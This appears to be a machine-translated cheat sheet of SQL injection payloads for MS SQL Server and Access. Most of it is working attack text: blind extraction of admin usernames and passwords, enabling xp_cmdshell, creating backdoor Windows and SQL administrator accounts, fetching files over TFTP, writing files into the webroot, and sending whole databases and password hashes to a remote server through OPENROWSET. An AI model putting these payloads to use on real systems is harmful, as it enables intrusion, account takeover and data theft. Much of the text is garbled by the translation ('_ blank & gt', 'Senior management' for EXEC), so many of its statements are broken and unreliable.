Judge whether there is an injection point.
; And 1= 1 and 1=2.
2. guessing the name of the table is generally nothing more than admin adminuser pass.
Passwords, etc. ..
And 0 (select count(*) from *).
And 0 (select
Count(*)from admin)- Determines whether there is an admin table.
3. Guess the account number. If you encounter 00)—
And 1= (select
Count(*) from admin where len (user field name) > 0)
And 1=(select count(*) from.
admin where len(_ blank & gt; Password field name password)& gt;; 0)
5. Guess the length of each field
Guess the length is to convert > 0 until the correct page is returned.
And1= (select count (*) from admin.
len(*)& gt; 0)
And1= (select count (*) from admin where len (name) > 6).
And1= (select count (*) from admin where len (name) > 5) the correct length is 6.
and
1= (select count (*) from admin where len (name) = 6) is correct.
And 1= (select
Count (*) from admin where len (password) >11) is correct.
And 1= (selection count (*)
Error length from admin where len (password) > 12 is12.
And 1=(select count(*) from.
Admin, where len (password) = 12) is correct.
Guess the characters
And 1=(select count(*) from.
Admin where left (name, 1)= a)- the first place to guess the user account.
And 1= (select count(*) from admin).
Where left (name, 2)= ab)- Guess the second place of the user account.
Just add one character at a time to guess. Guess how many digits you just guessed, and the account will come out.
and 1 =(select top 1 count(*)from Admin where Asc(mid(pass,5, 1))=5 1) -
This query statement can guess the China user and _ blank & gt password. Just change the numbers below into Chinese codes. Finally, the result is converted into characters.
Group by users.id is 1= 1-
group by users.id,users.username,
Users.password, users.privs has 1= 1-
; The user value is inserted (666,
Attacker, foobar, 0xffff)-
UNION SELECT TOP 1 COLUMN _ blank & gt; _NAME
FROM INFORMATION _ blank & gt_ schema. TABLE _ blank & gt
_NAME=logintable-
UNION SELECT TOP 1 COLUMN _ blank & gt; _ Name from
Information _ Blank & gt_ Schema. Table _ blank & gt _ name = logarithmic where
COLUMN _ blank & gt_NAME is not available (login _ blank & gt_id)-
Joint selection TOP 1
Column _ blank & gt _ name from information _ blank & gt _ schema. One of the columns
TABLE _ blank & gt_ NAME = log in table WHERE COLUMN _ blank & gt; _NAME is not here.
(login _ blank & gt_id, login _ blank & gt_name)-
Joint selection TOP 1
Login _ blank & gt_ Name from the login table-
UNION SELECT TOP 1 password from
logintable where login _ blank & gt_name=Rahul -
Look _ blank & gt server patched = error patched SP4.
And 1= (select @ @ version)-
The permissions of the Look _ blank & gt database connection account returned to normal, which proved to be the sysadmin permissions of the _ blank & gt server role.
and
1 =(SELECT IS _ blank & gt; _SRVROLEMEMBER(sysadmin)) -
Determine the connection _ blank & gt database account. (The connection with SA account is back to normal = it proves that the connection account is SA)
And sa= (select
System _ blank & gt_ user)-
And user _ blank & gt_name()=dbo-
and
0(select user _ blank & gt; _name() -
See if xp _ blank & gt_cmdshell is deleted?
And1= (select count (*) from master.dbo.sysobjects where xtype = X and name =
xp _ blank & gt_cmdshell) -
Xp _ blank & gt_cmdshell deletes and restores, and supports absolute path restore.
; Senior management
master . dbo . sp _ blank & gt; _ addextendedproc xp _ blank & gt_cmdshell, xplog70.dll -
; EXEC master . dbo . sp _ blank & gt; _ addextendedproc xp _ blank & gt_cmdshell,c:
\inetpub\wwwroot\xplog70.dll -
Reverse PING itself experiment
; Use master to declare @s
intexec sp _ blank & gt_oacreate wscript.shell,@ s outexec sp _ blank & gt_oamethod
@s,run,NULL,cmd . exe/c ping 192. 168.0 . 1; -
Add account number
; Declare @shell
INT EXEC SP _ blank & gt_OACREATE wscript.shell,@ shell OUTPUT EXEC SP _ blank & gt
_OAMETHOD @shell, run, null, C:\WINNT\system32\cmd.exe /c net user jiaoniang $
1866574 /add -
Create virtual directory e disk:
; Declare @o int exec
Sp _ blank & gt _ oacreatewscript.shell, @ oooutexecp _ blank & gt _ oamethod @ o, run,
Null, cscript.exe c: \ inetpub \ wwwroot \ mkwebdir.vbs-w Default website -V e -v e, e: \-
Access attribute: (write a webshell together)
declare @ o int exec sp _ blank & gt_oacreate
wscript.shell,@ o out exec sp _ blank & gt_oamethod @o,run,NULL, cscript.exe
c:\ inetpub \ wwwroot \ cha access . VBS-a w3svc/ 1/ROOT/e+browse
Blasting warehouse
Special _ blank & gt Tip: %5c=\ or submit/and \ modify %5.
And 0 (choose the first 1 paths from them
New form)
Get the library name (from 1 to 5 are all system ids, and it can only be judged if it is above 6).
And 1= (choose a name from them
Master.dbo.sysdatabases, where dbid=7)-
And 0 (select count(*) from
Master.dbo.sysdatabases where name & gt 1 and dbid=6).
Submit dbid = 7, 8, 9, 8, 9 in turn. ....
Get more information _ blank & gt database name
And 0 (choose top 1 name from them.
Bbs.dbo.sysobjects where xtype=U) bursts into a table, assuming admin.
And 0 (select top
1 Name from BBS. Dbo.sysobjects, where xtype = u and name is not in (admin)), to get other tables.
And 0 (select count(*) from bbs.dbo.sysobjects, where xtype=U and.
name=admin
And UID & gt(str (id)) burst to uid are assumed to be 18779569 uid=id.
and
0 (select the first 1 names from bbs.dbo.syscolumns, where id= 18779569).
Get an admin field, assuming it is user _ blank >;; _id
And 0 (choose top 1 name from them.
Bbs.dbo.syscolumns, where id= 18779569, the name is absent.
(id, ...)) to pop up other fields.
And 0_id in BBS.dbo.admin, where username & gt 1).
You can get the user name
You can get the _ blank & gt password. . . . . Suppose there is a user _ blank & gt_id user name, password and other fields.
And 0 (select count(*) from master.dbo.sysdatabases, where
Name & gt 1 and dbid=6)
And 0 (choose top 1 name from them.
Bbs.dbo.sysobjects where xtype=U) to get the table name.
And 0 (choose top 1 name from them.
Bbs.dbo.sysobjects where xtype=U and the name is not in (address))
and
0 (select count(*) from bbs.dbo.sysobjects, where xtype=U and name=admin.
And uid & gt(str(id)).
And 0 (choose top 1 name from them.
Bbs.dbo.syscolumns where id = 77357794).
Id=- 1 joint selection
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,1,12, 13, * from the administrator.
Id=- 1 joint selection
1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10,1,12, 13 from admin (union, access also.
Get WEB path
; Create table [dbo]. [swap]([swappass][char](255)); -
And (select top 1
swappass from swap)= 1 -
; Create table newtable (id int identity (1,1), path.
Varchar(500)) declares @test varchar(20) as the execution host .. xp _ blank & gt_regread.
@ rootkey = HKEY _ Blank & gt_ LOCAL _ blank & gt_MACHINE, @key=SYSTEM\CurrentControlSet.
\ Services \ W3SVC \ Parameters \ Virtual root \,@ value _ blank & gt_ name =/values = @ test
Output insert path (path) value (@test)-
; Use ku1; -
; create
Table cmd (string image); -create a table cmd of type image.
Test process of Xp _ blank & gt_cmdshell:
; Execute host .. xp _ blank & gt_cmdshell directory.
; Senior management
master . dbo . sp _ blank & gt; _addlogin jiao Niang $; -add SQL account
; Senior management
master . dbo . sp _ blank & gt; _ Password is empty, Jiao Niang $,1866574; -
; Senior management
master . dbo . sp _ blank & gt; _addsrvrolemember Jiaoniang $ sysadmin-
; Senior management
master . dbo . XP _ blank & gt; _cmdshell net user jiaoniang $1866574/workstations: *
/times:all/password chg:yes/password req:yes/active:yes/add; -
; Senior management
master . dbo . XP _ blank & gt; _ cmdshell net local group administrator s jiao Niang $
/add; -
Execute host .. xp _ blank & gt_servicecontrol startup, plan.
Start _ blank & gt service
Execute host .. xp _ blank & gt_servicecontrol startup, server.
;
DECLARE @ shell INT EXEC SP _ blank & gt; _OACREATE wscript.shell, @shell output execution
SP _ blank & gt_OAMETHOD @shell, run, null, C:\WINNT\system32\cmd.exe /c net user.
Jiao Niang $ 1866574 /add
; DECLARE @ shell INT EXEC SP _ blank & gt; _OACREATE
wscript.shell,@ shell OUTPUT EXEC SP _ blank & gt_OAMETHOD @shell,run,null,
c:\ WINNT \ system32 \ cmd . exe/c net local group administrator s jiao Niang $/add
;
Execute host .. XP _ blank & gt _ cmdshell TFTP-iyouipgetfile.exe-use TFTP to upload files.
; Declare @ asysysnameset @ a = XP _ blank & gt _+cmdshell exec @ adirc: \
; Declare @ a sysname set @ a = XP+_ blank & gt;; _cm'+'dshell exec @a dir c:\
; Statement @ a;; set @ a = db _ blank & gt_ name(); Back up database @a to
Disk= your IP, your * * * directory bak.dat
You can if you are restricted.
select * from openrowset
(_ blank & gtsqloledb, server; sa; , select OK! exec master . dbo . sp _ blank & gt; _addlogin
hax)
Query structure:
SELECT * FROM news WHERE id= ... and topic = ... and .....
Adminand 1= (Select count(*) from [User], where User Name = Victim, and
Right (left (user pass, 0 1), 1)= 1) and user pass.
Select123; -
; use
Master; -
: a or a name similar to fff%; -It shows a user named ffff.
And 1 (select
Count(email)); from [user]); -
; Update [user] setting email = (select top 1 name.
From sysobjects, where xtype=u and status & gt0) where name = ffff-
; update
[users] setemail = (select top1id from sysobjects, where xtype=u and name=ad).
Where name = ffff-
; update[users]set email =(select top 1 name from
Sysobjects, where xtype=u, id & gt5815771/kloc-0) where name = ffff-
; update
[users] set email = (select top1count (id) from password) where name = ffff-
; Update [user] setting email = (select top1pwd from password where id = 2), where
name = ffff-
; Update [User] Settings Email = (Select top 1 name from the password.
Where id=2) where name = ffff-
The above statement is the first user table in the get _ blank & gt database, and the table name is put in the mailbox field of the ffff user.
By looking at the user data of ffff, you can get the first table called ad.
Then get the ID of this table and the name of the second table according to the table name ad.
insert
User value (666, char (0x63)+char (0x68)+char (0x72)+char (0x69)+char (0x73),
char(0x 63)+char(0x 68)+char(0x 72)+char(0x 69)+char(0x 73),0xffff) -
insert
Convert to user value (667, 123, 123, 0xffff)
Insert user value (123,
Admin-,password, 0xffff)-
; And user & gt0.
; And (select the count from (*))
sysobjects)& gt; 0
; And (select count (*) from mysysobjects) > 0
//is access _ blank & gt; database
Enumerates the names of data tables
; Update aaa set aaa= (select top 1
Name in sysobjects, where xtype=u, status & gt0); -
This is to update the first table name to the aaa field.
Read the first table, and the second table can be read like this (add the table name and name just obtained after the condition).
; Update aaa set
AAA =(select top 1 name from sysobjects where xtype = u and status & gt; 0 and
name vote); -
Then id = 1552 and exists (select * from AAA, where AAA > 5).
Read the second table, one by one, until there is no more.
Read the fields like this:
; Update aaa set aaa= (select top 1
col _ blank & gt_ name(object _ blank & gt; _id (table name),1)); -
Then id= 152 and.
There is a (select * from aaa where aaa>5) error. Get the field name.
; Update aaa settings aaa= (select
top 1 col _ blank & gt; _ name(object _ blank & gt; _id (table name), 2)); -
Then id= 152 and.
There is a (select * from aaa where aaa>5) error. Get the field name.
[Get Table Name] [Update the field value to the table name, and then try to read the value of the field to get the table name]
Update table name set field =(select top 1
The name in sysobjects, where xtype=u, status & gt0 [and name] the table name you get.
Find one plus one ]) [where condition] select top1name from sysobjects where xtype = u and
Status & gt0 and name are not in (table 1, table 2, …).
Inject _ blank & gt vulnerability building _ blank & gt database administrator account and system administrator account [current account must be SYSADMIN group]
[Get the field name of the data table] [Update the field value to the field name, and then try to read the value of the field to get the field name]
Update table name set field = (Select
top 1 col _ blank & gt; _ name(object _ blank & gt; _id (the name of the data table to be queried), and the field column is: 1) [where condition]
Bypass id detection [use variables]
; Declare @ asysname set @ a = XP _ blank & gt _+cmdshell.
exec @a dir c:\
; Declare @ a sysname set @ a = XP+_ blank & gt;; _cm'+'dshell exec @a
Directory c:\
1, open the remote _ blank & gt database.
Basic grammar
select * from
OPENROWSET(SQLOLEDB, server = servername uid = sapwd = 1 23, select * from the table1
Parameters: (1) OLEDB provider name
2. The connection string parameter can be any port used for connection, for example
select * from
OPENROWSET(SQLOLEDB,uid = sapwd = 123; Network = DBMSSOCN address =192.168.0.1.1433; ,
Select * from the table
3. Copy the entire _ blank > of the target host; database
Insert all remote tables into local tables.
Basic grammar:
Insert into OPENROWSET(SQLOLEDB,
Server = servername uid = sapwd =123, select * 1) from table 2.
This line copies all the data in the table2 table on the target host to remote _ blank >;; Table 1 in the database. In practice, modify the IP address and port of the connection string appropriately to point to the required location, for example:
Insert into OPENROWSET(SQLOLEDB, uid = sapwd =123; Network = DBMSSOCN address =
192. 168.0. 1, 1433; , select from the table * 1) Select from the table 2 *
insert
OPENROWSET(SQLOLEDB,uid = sapwd=
123; Network = DBMSSOCN address =192.168.0.1.1433; , select * from.
_ blank & gt_sysdatabases)
select * from master . dbo . sys databases
insert
into OPENROWSET(SQLOLEDB,uid = sapwd = 123; Network = DBMSSOCN address =
192. 168.0. 1, 1433; ,select * from _ blank & gt_sysobjects)
select * from
user _ blank & gt_database.dbo.sysobjects
insert
OPENROWSET(SQLOLEDB,uid = sapwd = 123; Network = DBMSSOCN address =
192. 168.0. 1, 1433; ,select * from _ blank & gt_syscolumns)
select * from
user _ blank & gt_database.dbo.syscolumns
Copy _ blank & gt database:
insert
OPENROWSET(SQLOLEDB,uid = sapwd=
123; Network = DBMSSOCN address =192.168.0.1.1433; ,select * from table 1)select *
From the database .. table 1
insert
OPENROWSET(SQLOLEDB,uid = sapwd = 123; Network = DBMSSOCN address =192.168.0.1.1433; , select
* From Table 2) Select * ... Table 2 from the database.
The hash of the copy hash table login _ blank & gt password is stored in sysxlogins. The method is as follows:
insert
OPENROWSET (SQLOLEDB,
uid = sapwd = 123; Network = DBMSSOCN address =192.168.0.1.1433; , select * from.
_ blank & gt_ sysxlogins)select * from database . dbo . sysxlogins
After you get the hash, you can crack it violently.
The method of traversing the directory: first, create a temporary table: temp.
; Create temporary table (id
nvarchar(255),num 1 nvarchar(255),num2 nvarchar(255),num 3 nvarchar(255); -
; insert temp exec master . dbo . XP _ blank & gt; _ availablemedia- get all current drives.
; Insert into temp (ID) execmaster.dbo.xp _ blank >; _ subdirs c:\; -Get the subdirectory list
; Insert into temp(id, num1) execmaster.dbo.xp _ blank > _ dirtree c:\; -
Get the directory tree structure of all subdirectories and insert them into the temporary table.
; Insert temporary (id) executable file
master . dbo . XP _ blank & gt; _ cmdshell type c:\ web \ index . ASP; -View the contents of the file.
; insert
into temp(id)exec master . dbo . XP _ blank & gt; _ cmdshell dir c:\; -
; insert
temp(id)exec master . dbo . XP _ blank & gt; _cmdshell directory c:\ *. ASP/s/a; -
; insert
into temp(id)exec master . dbo . XP _ blank & gt; _cmdshell cscript
c:\ Inetpub \ admin scripts \ adsutil . VBS enum w3svc
; Insert into temp(id, num 1)
exec master . dbo . XP _ blank & gt; _ dirtree c:\; -(XP _ blank & gt; _dirtree public applicable right)
Write to table:
Statement1:and1= (select is _ blank > _ srvrolemember (sysadmin)); -
Statement 2: and1= (select is _ blank > _ srvrolemember (serveradmin)); -
Statement 3: and
1 =(SELECT IS _ blank & gt; _ SRVROLEMEMBER(setup admin)); -
Statement 4: and 1 = (select
IS _ blank & gt_ SRVROLEMEMBER(security admin)); -
Statement 5: and 1 = (select
IS _ blank & gt_ SRVROLEMEMBER(security admin)); -
Statement 6: and 1 = (select
IS _ blank & gt_ SRVROLEMEMBER(disk admin)); -
Statement 7: and 1 = (select
IS _ blank & gt_ SRVROLEMEMBER(bulk admin)); -
Statement 8: and 1 = (select
IS _ blank & gt_ SRVROLEMEMBER(bulk admin)); -
Statement 9: and 1 = (select
IS _ blank & gt_ MEMBER(db _ blank & gt; _ owner)); -
Write the path to the table:
; Create table
dirs(paths varchar( 100),id int) -
; Insert directory execution
master . dbo . XP _ blank & gt; _dirtree c:\ -
And 0 (choose the first 1 paths from them
dirs) -
And 0 (select the first 1 paths from the directory, where the paths do not
At (@Inetpub))-
; Create table directory 1 (path varchar( 100), id int)
; insert dirs exec master . dbo . XP _ blank & gt; _dirtree e:\web -
and
0 (select the first 1 paths from the directory 1)-
Put _ blank & gt database backup to Web directory: download
; Declare @ asysysnameset @ a = db _ blank & gt _ name (); Back up database @a to
disk = e:\ web \ down . bak; -
And 1= (select top 1 name from (select top 12
Id, the name from sysobjects, where xtype=char(85)) T order by id desc)
and
1 =(Select Top 1 col _ blank & gt; _ name(object _ blank & gt; _ id(USER _ blank & gt; _ login), 1)
From sysobjects) please refer to the relevant table.
And1= (select user _ blank >; _id from
USER _ blank & gt_ login)
And 0= (select user > _ login location from USER_blank.
User & gt 1)
-=- wscript.shell example-=-
Declare @o int
Senior management
sp _ blank & gt_oacreate wscript.shell,@o out
exec sp _ blank & gt_oamethod @o,
Run, empty, notepad.exe
; declare @ o int exec sp _ blank & gt_oacreate
wscript.shell,@ o out exec sp _ blank & gt_oamethod @o,run,NULL,notepad.exe-
Declare @o int, @f int, @t int, @ret int.
Declare @line varchar(8000)
exec sp _ blank & gt_ oacreate scripting . file system object,@o out
Senior management
sp _ blank & gt_oamethod @o,opentextfile,@f out,c:\boot.ini, 1
exec @ret =
sp _ blank & gt_oamethod @f,readline,@line out
while( @ret = 0)
begin
Print @ line
exec @ ret = sp _ blank & gt_oamethod @f,readline,@line out
end
Declare @o int, @f int, @t int, @ret int.
Senior management
sp _ blank & gt_ oacreate scripting . file system object,@o out
Senior management
sp _ blank & gt_oamethod @o,createtextfile,@f out,c:\inetpub\wwwroot\foo.asp, 1
exec @ ret = sp _ blank & gt_oamethod @f,writeline,NULL,
Declare @o int, @ret int
exec sp _ blank & gt_oacreate
speech.voicetext,@o out
exec sp _ blank & gt_oamethod @o,register,NULL,
foo,bar
Execsp _ blank & gt _ oaset property @ o, speed, 150.
Senior management
Sp _ blank & gt_oamethod @o, speak, NULL, all your sequel servers belong to us,
528
Waiting delay 00:00:05
; Declare @o int, @ret int exec
sp _ blank & gt_oacreate speech.voicetext,@ o out exec sp _ blank & gt_oamethod @o,
register,NULL,foo,bar exec sp _ blank & gt_oasetproperty @o,speed, 150 exec
Sp _ blank & gt_oamethod @o, speak, NULL, all your sequel servers belong to us.
528 Waiting delay 00:00:05-
Xp _ blank & gt_dirtree Applicable Public Rights
Senior management
master . dbo . XP _ blank & gt; _dirtree c:\
The information returned has two fields.
Sub-directory and depth. Sub-directory field is character type, and depth field is plastic field.
Create table directory (path
varchar( 100),id int)
Build a table. The table built here is related to xp _ blank & gt_dirtree, with equal fields and the same type.
insert dirs exec master . dbo . XP _ blank & gt; _dirtree c:\
As long as the table we build is equal to the field returned by the stored procedure, it can be executed! Achieve the effect of writing tables,
Step by step to achieve the information we want!